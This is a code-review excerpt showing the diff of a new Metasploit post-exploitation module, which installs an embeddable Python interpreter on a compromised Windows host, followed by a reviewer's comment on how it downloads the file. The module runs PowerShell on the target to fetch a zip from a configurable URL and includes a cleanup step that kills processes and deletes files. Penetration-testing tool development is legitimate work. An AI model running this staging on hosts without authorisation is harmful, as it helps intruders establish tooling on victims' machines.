modules/post/windows/manage/install_python.rb

```diff
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Windows::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'          => 'Install Python for Windows',
+                      'Description'   => '
+                        This module places an embeddable Python3 interpreter onto the target file system,
+                        granting pentesters access to a lightweight Python interpreter.
+                        This module does not require administrative privileges or user interaction with
+                        installation prompts.
+                      ',
+                      'License'       => MSF_LICENSE,
+                      'Author'        => ['Michael Long <bluesentinel[at]protonmail.com>'],
+                      'Arch' => [ARCH_X86, ARCH_X64],
+                      'Platform'      => [ 'win' ],
+                      'SessionTypes'  => [ 'meterpreter', 'shell' ],
+                      'References'	=> [
+                        ['URL', 'https://docs.python.org/3/using/windows.html#windows-embeddable'],
+                        ['URL', 'https://attack.mitre.org/techniques/T1064/']
+                      ]))
+    register_options(
+      [
+        OptString.new('PYTHON_URL', [true, 'Python embeddable zip URL', 'https://www.python.org/ftp/python/3.8.2/python-3.8.2-embed-win32.zip']),
+        OptString.new('FILE_PATH', [true, 'File path to store the python zip file; current directory by default', '.\\python-3.8.2-embed-win32.zip']),
+        OptBool.new('CLEANUP', [false, 'Remove module artifacts; set to true when ready to cleanup', false])
+      ]
+    )
+  end
+
+  def run
+    python_folder_path = File.basename(datastore['FILE_PATH'].to_s, File.extname(datastore['FILE_PATH'].to_s))
+    python_exe_path = python_folder_path + "\\python.exe"
+
+    # check if PowerShell is available
+    psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
+    if !file? "%WINDIR%\\System32#{psh_path}"
+      fail_with(Failure::NotVulnerable, "No powershell available.")
+    end
+
+    # Cleanup module artifacts
+    if datastore['CLEANUP']
+      print_status("Removing module artifacts")
+      script = "Stop-Process -Name \"python\" -Force; "
+      script << "Remove-Item -Force #{datastore['FILE_PATH']}; "
+      script << "Remove-Item -Force -Recurse #{python_folder_path}; "
+      psh_exec(script)
+      return
+    end
+
+    # download python embeddable zip file
+    script = "Invoke-WebRequest -Uri #{datastore['PYTHON_URL']} -OutFile #{datastore['FILE_PATH']}; "
+    print_status("Downloading Python embeddable zip from #{datastore['PYTHON_URL']}")
+    psh_exec(script)
```

Comment:
Why are you using powershell to download the file here? You should doing this on the framework side since you already have access to the machine.